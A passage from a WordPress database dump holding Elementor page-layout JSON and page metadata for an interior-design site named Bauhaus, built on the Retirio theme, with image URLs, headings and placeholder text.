"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4266,4927,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4267,4927,'_elementor_pro_version','3.8.1'),(4268,4928,'_wp_page_template','elementor_header_footer'),(4269,4928,'_elementor_edit_mode','builder'),(4270,4928,'_elementor_template_type','wp-page'),(4271,4928,'_elementor_version','3.8.1'),(4272,4928,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Tingkatkan Kualitas Hidup Anda dengan Bauhaus 